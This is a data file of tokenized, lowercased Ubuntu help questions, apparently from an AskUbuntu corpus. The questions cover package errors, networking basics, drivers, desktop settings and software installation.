64524	unable to download software center from package manager : 404 not found	i removed software center from the terminal and after that i tried to install it from synaptic package manager . now i get a message saying that it 's unable to retrieve a few packages . have a look : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/k/kdepimlibs/libkmime4_4.7.1+git111001-0ubuntu1_i386.deb 404 not found [ ip : 91.189.92.170 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/k/kdepimlibs/libkimap4_4.7.1+git111001-0ubuntu1_i386.deb 404 not found [ ip : 91.189.92.170 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/a/akonadi/akonadi-server_1.6.1+git110927-0ubuntu1_i386.deb 404 not found [ ip : 91.189.92.170 80 ] ... w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/k/kdepim-runtime/kdepim-runtime_4.7.1+git111001-0ubuntu1_i386.deb 404 not found [ ip : 91.189.92.170 80 ] i actually was getting report error pop-ups and was irritated with it so removed the software center and after that i never got this error . please help me .
64526	is there a way to get an indication after i double click a desktop icon ?	i 'm setting up edubuntu for my son 's kindergarten , and i put shortcuts on the desktop for some of the applications . the problem is that when you double click an icon , you get no visual hint that anything at all has happened . this causes even me to doubt whether my double-click was detected , and i end up launching several instances of the same application . i suspect it would be even worse for the teacher and kids . is there a way to get something to happen as soon as you double-click the icon ? alternatively , is there a way to put `` buttons '' on the desktop , so that clicking them would create an obvious visual cue of being pressed and depressed ?
64530	what is `` nepomuk backup '' and why is it installed ?	i 've noticed a new item under applications - > system tools : nepomuk backup . i have n't installed it , and it just showed up recently . why is it there and why was it installed ( possibly with some other kde program ) without my consent ? is it safe to remove it ?
64532	understanding my route table	this is n't programming at all , but i 've seen related topics so i thought why not . i am using ubuntu and currently trying to learn basic networking . i read a lot of theory , so i understand the terms ( gateway , netmask etc ... ) but i ca n't seem to understand my own network at home . i have a router that serves my laptop ( wireless ) and my desktop computer ( ethernet ) . when i run route in my desktop computer this is the output : destination gateway genmask flags metric ref use iface 10.0.0.0 * 255.255.255.0 u 1 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 default rta1025w.home 0.0.0.0 ug 0 0 0 eth0 i ca n't understand it . i know the table specifies routing rules , i just ca n't understand those rules . an example would be highly appreciated : if i send a datagram to another computer on my home network , the first rule should match right ? what column specifies where the datagram is redirected to ? also , just to make sure , if i am trying to reach a website then all datagrams are directed to my router , right ? also , what is link-local ? it is defined in my /etc/networks file , i just do n't know what that is . i hope i was clear with what i am trying to understand , if not it 's only because i 'm a complete novice . thanks anyway ! edit : to make it clear , i did read man route . as far as i understand : destination refers to the destination of the datagram currently being routed . the same goes for gatway and genmas . that 's great but what i do n't understand is where will it be routed to ? that 's what i am trying to understand yotam
64535	network configuration : resolv.conf and hosts	i read this manual and i 'm a little confused . this is what i do n't undetstand : when your system tries to resolve a hostname to an ip address or determine the ostname for an ip address , it refers to the /etc/hosts file before using the name servers so : 1 ) when does the system tries to resolve a hostname ? to my understanding its when a datagrams 's header specifies a hostname , am i right ? 2 ) why does it refer to hosts before resolv.conf ? 3 ) after the hostname is resolved , the system turns to the routing table ?
64543	disable launching home folder at startup	each time i start my ubuntu netbook remix 10.10 , the home folder is launched . how can i disable auto-launch of home folder ?
64545	scheduling a reboot on a remotely located ubuntu server	i work on a ubuntu server located in a place where i do n't usually go . i use ssh over openvpn to access it . the machine has multiple wired interfaces , many static routes and multiple default gateways to wan . i frequently change interface adresses and routes . most of the times the changes i do are temporarily -- a reboot would reset the experiments i have done . in some cases some of those modifications have gone wrong , and the machine has gone offline . in such cases i had to call up someone at the place where the server is located to send the machine into a reboot . now i would like to schedule a reboot -- lets say after 2 hours the machine should go into a reboot cycle . and in those two hours i can do whatever temporary experiments that i want . if all the temporary changes succeed then i should be able to prevent the `` afer 2 hour '' reboot from happening . so what i want is : how to tell the server to reboot after a certian time ? if i decide that the machine should not go into a reboot , i should be able to cancel it .
64548	how to find unused ip address on a network ?	i just want to find out unused ip address on a network . i think it is possible with nmap . can any one say me the way pls ? note : i just need the free ip list alone .
64555	start ubuntu directly into gnome 3 interface rather than unity	i 'm using ubuntu 11.10 and had many issue and that 's ok because it is still in beta version and i installed gnome 3 and in love with it and want my system to startup directly into gnome interface , so in case thats possible please help me out
64558	shortcut to the desktop in the menubar	how do i get a shortcut to my desktop in the menubar ? i.e . a clickable item that minimizes ( or the like ) all windows that are currently open . thanks
64560	why using dhcp service ?	a few simple questions for a total beginner : 1 ) why use dhcp ? i am running a small home-network : 1 desktop computer and twp lap-tops . what is the big advantage in dhcp for me ? what configurations does it save me from doing ? 2 ) i read here the following paragraph : the dynamic host configuration protocol ( dhcp ) is a network service that enables host computers to be automatically assigned settings from a server opposed to manually configuring each network host who provides that service ? is it my isp , a local program or a local hardware ( like my router ) ? also , what configuration files will be edited as a result of using dhcp ? thanks !
64561	modifying the behavior of < alt > tab ( possibly ) using compiz	i have set up compiz and my desktop in a way that i really like that maximizes my screen real estate on my 10 ' netbook , but there is a small annoyance that i would like to know if i could change . the set up ubuntu 11.04 using ubuntu classic with compiz on an asus eee 1015pem . i have a 3x3 desktop wall with all windows set to maximize on creation , and a single gnome-panel at the top that is set to auto-hide . i 'm using the static application switcher plugin for controlling my tab behavior , but i 'm not necessarily attached to it . the modification i 've made to that plugin is that i have set tab to cycle between all windows on all workspaces , instead of just the windows on the current workspace . the problem i would like tab to cycle between any windows on the current workspace before other workspaces . for example , if i have chrome on workspace ( 1,1 ) , gedit on workspace ( 1,2 ) , and i open a terminal on workspace ( 1,2 ) , i would like the tab order to be terminal , gedit , chrome , regardless of the time of creation . is there a way to do this ?
64565	how do i connect to a peap encrypted wifi connection ?	i need to connect to my school 's wifi with ubuntu but it is encrypted with peap and my current network manager does n't support peap . what do i need to do ?
64566	geeqie in full screen using external second display connected to laptop	it used to work fine under 11.04 . i 've got thinkpad hooked up with external display via docking station . laptop is a main display , external lcd is for web browser or for pictures display . i use geeqie for viewing jpgs , and when i press full screen on any picture it goes to the laptop display instead staying on the external lcd . on ubuntu 11.04 it was working as it should . what could be the problem ?
64569	how do i install gimp 2.7.3 ?	i 'm trying to install gimp 2.7.3 from the repository of launchpad ppa : matthaeus123/mrw-gimp-svn , but when i try to install , it installs the package gimp with the 2.6 version instead of the 2.7 , but the others libraries are installed with 2.7.3 . there 's an error ? how i can install it ?
64570	how do i configure the screen to lock when i close the lid ?	i 've configured ubuntu to put the screen in black when i close the lid of the laptop , but i want that , when i open it again , it demand the password like blocking the screen with ctrl+alt+l , but i ca n't find the correct option . could you tell me ?
64574	how can i convert an itunes wav music library to flac from the command line ?	i have a large music library that is currently managed by itunes in windows . when i started out 5 or 6 years ago ripping my music to my pcs i had a fairly basic understanding of audio formats , and i somewhat arbitrarily chose to rip all my cds into the wav format . so now i have over 1 tb of music ripped in itunes , and none of my files have metadata attached . ( itunes software stores the artist/song/etc . info in an xml file , so i have a reference , and the library is fine , works great in itunes/windows ) . i 've been using ubuntu exclusively for almost a year now , and i want to convert my music library , which is currently spread out over 3 hard drives , to flac files w/ metadata , and move away from itunes . what 's the most reliable/efficient way to convert all my wav files across the hard drives to flac from the command line while retaining/adding metadata to the new flac files ? there are just too many files to go through one album at a time . is there any audio fingerprinting software out there that could find the metadata after the wav > flac conversion ? should i try and reference the itunes xml file or is that not necessary ?
64577	installation from a live usb changes the network device name ( eth0 , eth1 , ... )	i have created a live usb from terminal using the following command , usb-creator-gtk now the problem is when i install the first system using this live usb , it assigns the network device of the 1st machine as eth0 . however when i install the second machine using this same live usb it assigns the network device of the 2nd machine as eth1 and third as eth2 and so on . why this happens ? how to solve this issue ?
64585	how do i change default session on ubuntu 11.04 live cd	i 'm working on a remaster of an ubuntu 11.04 live cd and i would like the default session to be ubuntu classic instead of unity when booting into the live environment . what file ( s ) do i need to modify to achieve this ? ubuntu forums , google , and man pages are not helping me turn up the information i need .
64588	how to see which graphics card is loaded on start or install	i have a brand new hp desktop pc ( pavilion elite hpe-557de ) . i have tried to install some versions of ubuntu ( 10.10 , 11.04 , 11.10 beta 2 ) for 2 days , and every time gnome is started , after 2-3 minutes of work ubuntu freezes . after a hard restart it comes the same problem . i gave the pc to one pc expert , who has installed 5 different linux distributions and also is coming the same problem . every time linux is started , then it freezes . my question is , is it possible that the on-board graphics card is not disabled , and it is doing this freezing stuff ? hp says that `` integrated video is not available if a graphics card is installed '' , but is there a possibility , that this is not the case ? how can i see which card is loaded ?
64605	how do i set focus follows mouse ?	is there a way to set up `` focus follows mouse '' behavior in unity ?
64608	how do i fix the error below that i get when i try to update ubuntu 11.10 ?	this website would n't let me post the links so i replaced them with ( link ) . which is kind of stupid because i would have liked to copy exactly what i am seeing . anyway here is what i get : w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : ( link ) oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : ( link ) oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : ( link ) oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : ( link ) oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : ( link ) oneiric-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : ( link ) oneiric-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch ( link ) w : failed to fetch ( link ) w : some index files failed to download . they have been ignored , or old ones used instead .
64609	installing ubuntu server on macmini server 5,3	i 've gotten hold of a neat new mac mini , i7 processor , 2x500gb hard drives and so on - model macmini5,3 . ( from sysctl hw.model ) i now want to install ubuntu server on it as i am not super comfortable in os x server . my problem is that while i can make a bootable install usb ( using unetbootin or usb-creator-gtk ) and get to the install menu of it i ca n't get the installer to start . i am fairly sure that this is due to lack of graphics drivers . i can get the thing to install from a `` mini '' install iso which does n't have the graphical installer but for some reason that never boots once it 's installed . is there any way to change the default installer on a regular install iso to the non-graphical one ? i have tried using the `` alternate '' iso 's but they run into the same problem as the regular ones . or can you edit the install command to exclude the graphics ?
64611	flashplugin-installer conflicts with libc-bin ?	i recently installed 11.10b2 , and when i try to install adobe flash , apt tells me that it conflicts with libc-bin . that does n't sound quite right . below is the output of sudo apt-get install flashplugin-installer before i aborted . shawn @ shawn-p35-ds3l : ~ $ sudo apt-get install flashplugin-installer reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : flashplugin-downloader : i386 gcc-4.6-base : i386 libasound2 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libatk1.0-0 libatk1.0-0 : i386 libatk1.0-data libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc-bin : i386 libc-dev-bin libc6 libc6 : i386 libc6-dev libcairo2 : i386 libcomerr2 : i386 libcups2 libcups2 : i386 libcurl3 : i386 libdatrie1 : i386 libdb5.1 : i386 libdbus-1-3 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgail-common libgail18 libgcc1 : i386 libgcrypt11 : i386 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-0 : i386 libglib2.0-0 libglib2.0-0 : i386 libglib2.0-bin libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgtk2.0-0 libgtk2.0-0 : i386 libice6 : i386 libidn11 : i386 libjack-jackd2-0 libjack-jackd2-0 : i386 libjasper1 : i386 libjpeg62 : i386 libjson0 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libldap-2.4-2 : i386 libnspr4 : i386 libnspr4-0d : i386 libnss3 : i386 libnss3-1d : i386 libogg0 : i386 libpango1.0-0 libpango1.0-0 : i386 libpcre3 : i386 libpixman-1-0 : i386 libpng12-0 : i386 libpulse0 libpulse0 : i386 librtmp0 : i386 libsamplerate0 : i386 libsasl2-2 : i386 libsasl2-modules : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 libsqlite3-0 : i386 libssl1.0.0 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libthai0 : i386 libtiff4 : i386 libuuid1 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwrap0 : i386 libx11-6 libx11-6 : i386 libxau6 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcb1 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxft2 : i386 libxi6 : i386 libxinerama1 : i386 libxrandr2 : i386 libxrender1 : i386 libxt6 : i386 nspluginviewer : i386 nspluginwrapper zlib1g : i386 suggested packages : firefox : i386 x-ttcidfont-conf : i386 msttcorefonts : i386 ttf-bitstream-vera : i386 ttf-dejavu : i386 ttf-xfree86-nonfree : i386 xfs : i386 libasound2-python libasound2-python : i386 glibc-doc glibc-doc : i386 locales : i386 cups-common : i386 rng-tools : i386 gnutls-bin : i386 krb5-doc : i386 krb5-user : i386 librsvg2-common : i386 gvfs : i386 jackd2 jackd2 : i386 libjasper-runtime : i386 ttf-japanese-mincho ttf-thryomanes ttf-baekmuk ttf-arphic-gbsn00lp ttf-arphic-bsmi00lp ttf-arphic-gkai00mp ttf-arphic-bkai00mp ttf-japanese-gothic : i386 ttf-japanese-mincho : i386 ttf-thryomanes : i386 ttf-baekmuk : i386 ttf-arphic-gbsn00lp : i386 ttf-arphic-bsmi00lp : i386 ttf-arphic-gkai00mp : i386 ttf-arphic-bkai00mp : i386 libsasl2-modules-otp : i386 libsasl2-modules-ldap : i386 libsasl2-modules-sql : i386 libsasl2-modules-gssapi-mit : i386 libsasl2-modules-gssapi-heimdal : i386 the following packages will be removed : libc-bin the following new packages will be installed : flashplugin-downloader : i386 flashplugin-installer gcc-4.6-base : i386 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libatk1.0-0 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc-bin : i386 libc6 : i386 libcairo2 : i386 libcomerr2 : i386 libcups2 : i386 libcurl3 : i386 libdatrie1 : i386 libdb5.1 : i386 libdbus-1-3 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libgcrypt11 : i386 libgdk-pixbuf2.0-0 : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgtk2.0-0 : i386 libice6 : i386 libidn11 : i386 libjack-jackd2-0 : i386 libjasper1 : i386 libjpeg62 : i386 libjson0 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libldap-2.4-2 : i386 libnspr4 : i386 libnspr4-0d : i386 libnss3 : i386 libnss3-1d : i386 libogg0 : i386 libpango1.0-0 : i386 libpcre3 : i386 libpixman-1-0 : i386 libpng12-0 : i386 libpulse0 : i386 librtmp0 : i386 libsamplerate0 : i386 libsasl2-2 : i386 libsasl2-modules : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 : i386 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libthai0 : i386 libtiff4 : i386 libuuid1 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwrap0 : i386 libx11-6 : i386 libxau6 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcb1 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxft2 : i386 libxi6 : i386 libxinerama1 : i386 libxrandr2 : i386 libxrender1 : i386 libxt6 : i386 nspluginviewer : i386 nspluginwrapper zlib1g : i386 the following packages will be upgraded : libasound2 libatk1.0-0 libatk1.0-data libc-dev-bin libc6 libc6-dev libcups2 libgail-common libgail18 libgdk-pixbuf2.0-0 libglib2.0-0 libglib2.0-bin libgtk2.0-0 libjack-jackd2-0 libpango1.0-0 libpulse0 libsqlite3-0 libssl1.0.0 libx11-6 warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! libc-bin 19 upgraded , 91 newly installed , 1 to remove and 432 not upgraded . need to get 36.0 mb of archives . after this operation , 59.7 mb of additional disk space will be used . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ]
64612	where can i find a log of the information shown at boot splash ?	an elderly computer of ours has stopped working . when it 's turned on , it gives an error of `` unsupported display '' - this is normal for us and happens because the graphics card ca n't render the splash screen . however , now it just stays stuck at that error message and wo n't boot . i booted a live cd and looked over a bunch of log files but none of them have entries from today , the day the problem started . is there any way to figure out what the error on the hidden splash screen is ?
64613	how to access and change tcp configuration	i wan na play the buffer size and other settings in the tcp configuration in order to finish the project that am working on and analyzed the results ? ? i want to know if there is a file or something else that i can access to see and edit these settings and since am new to ubuntu i have no clue where to start so if you could please be informative in the answers i will appreciate that . i have one more question is it different in fedora or is it the same as ubuntu ? because i have to do it on both os thanks for helping
64614	flash in ubuntu 11.10 ?	i have ubuntu 11.10 installed , i have the flashplugin : i386 installed , however both google chrome and firefox are telling me that flash is not installed . the flash configuration utility is there , so i know that it is installed , it 's just not showing up . how can i fix this ? hailwood @ ubuntu : ~ $ dpkg -- get-selections | grep flash adobe-flash-properties-gtk : i386 install adobe-flashplugin : i386 install flashplugin-downloader : i386 install
64617	how can i install modem drivers for hp dv6531nr ?	i 'm running ubuntu 11.04 on an hp dv6135nr laptop . ubuntu does not find drivers to install for the built in modem . does anyone have experience with obtaining and installing modem drivers on this laptop ?
64619	easily make website without coding	i know windows has some create programs to make websites attractive websites without coding . can anyone recommend to me some programs that run on linux where i can create my own websites with a fair amount of flexibility in design ?
64620	macbook pro 8.1 and ubuntu conflict	i recently installed ubuntu 10.04 lucid onto my macbook pro 8.1 over my mac os , and i am having many issues . the wireless is not working , the software update window will respond just long enough to get my hopes up , right click will not work , the mac hotkeys refuse to work , and the ubuntu software center spouts that all of the provided packages are `` unverified '' , and outright refuses to let me install anything , even a software bit that worked on my last macbook/ubuntu install . help ! ? ! ? ! ? !
64621	changing full name	i ca n't change my full name ( registered erroneously ) . i did login and tried to change it . in the windows application it still shows the erroneous full name . thanks
64627	how to upgrade effortlessly from ubuntu 10.04 to ubuntu 11.10 on the same machine	ubuntu 11.10 is now a few days away . i have quite a lot of apps installed on ubuntu 10.04 . how can i effortlessly upgrade from ubuntu 10.04 to ubuntu 11.10 . please suggest the minimal disruption route . in case i have to reinstall all the apps how can i take a backup of all the apps that i have..
64631	how to restore the default lubuntu panel ?	i accidentally deleted the whole panel . how can i restore the default panel ? update : i found a minimized panel on top . but i have 2 more questions . now i have a small panel that has a network connection . however , i can not find panel settings when i right click . i 'd like to set it to be minimized while not being used . i can not find power ( leading to suspend , hibernate , etc ... ) in panel settings .
64632	why isnt there a kde client for ubuntu one	why isnt there kde client ? there is windows client but none for kde . i am kubuntu user and would like to use the service .
64636	how to install groovy in ubuntu ?	i need to install groovy 1.8.2 in my ubuntu 10.04 . here is the site download link . there are two options available binary download and source download . i do n't know which one to do for ubuntu since i 'm from windows background where i will just run the .exe file and the job is done . and note that from command prompt i have tried to install it , it shows only the previous version of groovy 1.7 . but i need to install groovy 1.8 . since i 'm a novice in ubuntu , it will be good if the answer is in simple steps . thanks in advance .
64637	i am using dell xps laptop . core i5 ; brightness of screen never reduces	brightness of my screen never reduces when using function keys nor when i change the settings in power management . i also rebooted the laptop after changing the setting but brightness dint reduce . please help ! regards , shantanu .
64646	create a service in linux using shell script	i want to create a service in linux as we do in windows . which i can start or stop with help of a script . the service has to launch a gaming application which has some dependencies associated with it . basically i want a script executing which creates a service in linux , this service will basically launch a gaming application ( launching is also done through a script ) , so its like the service has to launch a script . purpose of the service : i will like the service to auto restart the application in case it crashes . got to know that auto restart of application can be done through services please help me on this i am new to linux : (
64647	how to run rc.local as normal user ?	i have some commends that i wish to be called right after login , including 'startx ' , and i thought rc.local seems a nice place for them , but the problem is that rc.local is run as root and i do n't want that , obviously i can do something like this : su username -c somecommend-here but i am looking for a way to run the whole 'rc.local ' as normal user , or perhaps there is a better place to put my code ? ps . i am using ubuntu-mini-remix 1104i386 thanks
64652	set terminal size permanently	i click in terminal : terminal- > 132x43 to change terminal size but after each reboot terminal size is set to default setting and i have to change it again . how to set it permanently ?
64653	problem regarding ati radeon hd 6470m graphics card	i am facing problem regarding ati radeon hd 6470m graphics card in ubuntu 11.04 . my laptop configuration : manufacturer : hp processor : core i5 2.3ghz ram : 8gb graphics card : ati radeon hd 6470m 1 gb . problem : while installing ubuntu 11.04 i got the blank screen and if i wait for few minutes it got start normally but if i press any key while booting ( with blank screen ( same while installing ) ) it not able to start ( same for the installation ) the os . but if i install the ati proprietary driver the blank screen problem resolved but i am not able to start ubuntu 11.04 in unity not event with classic effect . while installing ati proprietary driver the catalyst control center intalled but when i open it it gives error : '' initialization error : there was a problem initializing catalyst control center linux edition . it could be caused by the following . no ati graphics driver is installed , or the ati driver is not functioning properly . please install the ati driver appropriate for you ati hardware , or configure using aticonfig . '' i am new with this error please help me . thank you
64656	bios upgrade on proliant dl380 g4	i want to make a bios upgrade to my g4 server which is running ubuntu server edition 11.04 . i need a good tutorial to make this happen without any consequences to my hardware . if anybody had this type of server and succeeded to upgrade the bios please share this information / steps with us . thanks in advance !
64658	how do i make the clock stop chiming every hour on the hour ?	i 'm using a fully updated 11.10 install . after i installed the gnome-shell 3.2 package the clock started chiming every hour ( it sounds like a doorbell ) . if i 'm listening to something that needs to be turned up loud ... well you get the idea . it 's annoying to say the least . disabling system sounds does not stop it . i can not find anything in gsettings or dconf/gconf-editor . is there any one out there with a fix before i go crazy ?
64661	how to change font size of subtitles in totem movie player	font size of subtitles in totem movie player is too large for me . how to decrease the font-size , and can i configure the font type ?
64662	ms exchange 2007 client in ubuntu 10.04	i am using ubuntu 10.04 with default *evolution*n client.i am able to configure evolution and work with ms exchange 2007 , i am not happy with evolution . so i am looking for some other client please recommend me the best one . please waiting for the same
64665	reset button does n't reset the machine when using ubuntu	in my 20 years of working with computers , i 've always assumed that the hardware reset button on a desktop machine was hard-wired to the motherboard , causing some kind of short-circuit which would reset the machine no matter what state it was in ( except for power off of course ) . i was completely surprised to learn that on my current core i5-2500 machine , with an asrock h67m-ge motherboard , this does n't seem to be the case , at least not when running ubuntu . instead of resetting immediately , the reset button now does nothing when pressed shortly . when pressing it for a few seconds , the machine shuts down instead , to a somewhat mysterious state ( it 's not the 'normal ' shutdown state , i 'll see if i can elaborate on that later ) . when running windows , the reset switch works as expected . also , the reset switch works fine when i 'm in the bios / efi . as soon as any ubuntu component has been loaded ( it starts from the moment i see the startup menu from the live cd ) , the reset button stops working normally . can anyone explain to me how such a thing is even possible ? has the reset button 'wiring ' perhaps been changed since the introduction of efi ? and could this be described as a bug in ubuntu ? i 'm running oneiric since earlier versions of ubuntu would n't even start from the live cd . not even memtest ( ! ! ) would work properly . again , windows booted just fine , no matter the version . i must admit i did n't try installing from the alternate cd , but imho that should n't be necessary on a 'normal ' desktop pc . and it also should n't be related to the reset button problem : - )
64668	can ubuntu one sync files `` in place '' instead of filling up /tmp ?	i enabled ubuntu one in 11.04 and marked my documents folder for sync . now , it 's very slugish ( which was mentioned here already ) , managed to upload only 160 mb in 5 days ( it 's a disaster imo ) . anyway , apart from being so slow , u1 fills my /tmp with the files to be synced ( /tmp/tmpyemldg etc . ) , which makes my root partition to run out of space . the folder to sync is about 3.5 gb and all that is copied to /tmp . why u1 does n't sync `` in place '' doing compression on-the-fly ? if i had , say 20 gb to sync , u1 would attempt to copy all of it to /tmp ? can i limit the amount of data copied to /tmp ? while u1 is so terribly slow it does n't really need more than it can handle . even if the files to be synced have to be deflated to disk ( which i doubt ) , this should be a small cache not the whole thing .
64670	what happened with message notifications from empathy ?	i notice that some changes have been made in message notifications from empathy in 11.10 . i open chat in empathy with another user but when a message is received there are no notifications in the messages menu ( only a pop-up window ) . in 11.04 the `` mail icon '' in the message menu became blue and i could switch to chat with new messages using that menu . it was quite useful . is there any way to return to the old notification behavior in the messages menu in 11.10 ?
64671	how to partition a disk for installing ubuntu ?	currently i 'm running vista on my laptop but it 's getting slower each day , so i decide to install an ubuntu on my laptop , while for some reason i still need to keep the vista . right now i have two disks under vista : c : / for the vista system and installed software , d : / for my personal data , e.g , music , movie , photo . i want to keep some of the personal data and delete something unnecessary to spare about 50gb space . so my question is this : is there a way to 'cut ' the free 50gb into a independent disk , say e : / , so i can install ubuntu on it , while not affecting my vista system ?
64681	wireless driver working as ethernet ? ( ubuntu 11.04 )	i have n't very affinity with networking/lan , so i do not quite understand what 's going on with my wireless driver , that 's why i came here for help . my drive does not find any working wireless connection until i plug a network cable in . if i do this , it find working wireless connections and even if i plug the cable off , it stills on by wireless normally . so , i found this quite strange but this is it . i typed 'ifconfig ' in linux terminal and it returned 3 network interfaces : eth0 , eth1 and lo . the eth1 is being displayed as ethernet , but actually this is the wireless , i know this because if i turn wireless off ( by laptop multimedia function fn+f2 ) eth1 just disappears and i 'm disconnected from internet . so this is it . is there some way to configure the wireless driver by any ifconfig command line ? or is there some other way to fix it ? thanks ! p.s : going to menu system > administration > additional drivers , it says i 'm using broadcom 802.11 linux sta wireless driver .
64682	is there a way to active 3d on a geforce go 7400 ?	iâm running ubuntu 11.10 , is it some way to activate 3d acceleration like in the 11.4 or do i have to run it in slow 2d mode . 2d mode works out of the box when fresh installing , but i think 3d was a bit faster .
64685	camera card slot is not recognised on a dell inspiron e1705	i have a dell inspiron e1705 and the the camera card slot does not appear nor when i put the camera card in it does it recognize it .
64686	openshot does n't launch with `` failed to import '' message	openshot stopped working on my friend 's laptop . running it in a terminal produces this . i suspect a python library it needs was removed . -- -- -- -- -- -- -- -- -- -- -- -- - error 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- failed to import 'from openshot import main' error message : can not import name main -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - error 2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- failed to import 'from openshot.openshot import main' error message : 'nonetype ' object has no attribute 'set_cursor' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- tried : reinstalling openshot searching for the error reveals this bug , but i do n't have the locale problem .
64692	how to do i put all my files where the paste function have been disabled ?	i 'm new to ubuntu and i need to install groovy graphics builder . i downloaded from here . the site says to do two things : drop all jar files into $ groovy_home/lib drop the scripts into $ groovy_home/bin but how to do this ? i have installed groovy in this path : /usr/share/groovy i guess the site asks me to put ( paste ) all the downloaded files in /usr/share/groovy/bin and /usr/share/groovy/lib respectively as suggested by the site . but when i try to paste the files in /usr/share/groovy/bin i see the paste command have been disabled . since i 'm a novice i do n't know what to do , can anyone say me how this can be done ? i use ubuntu 10.04 thanks in advance .
64693	how to remove shortcut key for unity , which is `` meta '' key on keyboard	i 'm a big fan of meta key , but in unity interface , by pressing that key , unity 's interface will show up , hindered further action with that key , e.g meta + tab . without hacking its source code , anyway to remove that shortcut key ?
64697	dual monitor unity launcher opening on wrong monitor in 11.10	i just upgraded to oneiric and now the unity dash launcher is on my left screen . i really want it on my right screen . but how do i do that ? why do i want the dash on my right screen ? my left screen is a smaller older monitor that i use to read/watch documentation or keep my music player open . i work on my right screen , that is bigger and is a better monitor . i have an nvidia card and in the nvidia settings it is setup that the right monitor is my primary monitor , but oneiric does n't follow this setting anymore . i thought this was a bug , but is seems to be intended behavior ... https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/742544 some poster in this thread explains that he `` patched it locally '' , but i have no idea how to do this . does somebody know how to do this ? or maybe there is another solution ?
64700	how do i feed skype a prerecorded video ?	i would like to feed skype ( 2.2.0.35 ) with a pre-recorded video . anyone has done this ? please share your experience . i 've compiled gstfakevideo , but it fails like this : alexk @ z2 : ~/gstfakevideo $ gstfakevideo gst.c create_pipeline ( 155 ) : pipeline created gst.c create_pipeline ( 159 ) : pipeline linked gst.c shim_ioctl ( 201 ) : request=80685600 nr 0 gst.c shim_ioctl ( 296 ) : result=-1 error=515 неизвестная ошибка 515
64701	how to set the default gcc version for only one user	the question choose gcc and g++ version answers how to do it , but i could not figure out , if it only affects me or also all the other users of the system as i have to use sudo . i share a server ( 11.04 ) with other people and i am the only one who has to use gcc 4-4 .
64703	how do i upgrade virtual box ?	when i run sudo apt-get update ; sudo apt-get upgrade in ubuntu 11.04 , i get the exception below . virtualbox is currently on '4.1.2 ' . i have installed apt-cacher-ng on this machine and install apt-get points locally . w : failed to fetch bzip2 : /var/lib/apt/lists/partial/download.virtualbox.org_virtualbox_debian_dists_natty_contrib_binary-i386_packages hash sum mismatch praveensripati @ mymini : /etc/apt/apt.conf.d $ cat 01apt-cacher-ng-proxy acquire : :http { proxy `` http : //localhost:3142 '' ; } ; what could be the reason for this ?
64705	how to access file management tools from the `` select file '' dialog ?	i often only realize i need to clean up a directory when i reach it via the file selection dialog . are there good ways to hop straight from that dialog to a window manager in the same folder so i can clean up ( mostly delete ) stray files ? can anyone suggest other short paths from 'open file ' to 'move'/'delete ' ? i was thinking that i wanted to know how to add `` copy '' to the right click menu within the file selection dialog , but i 'm open to any suggestions .
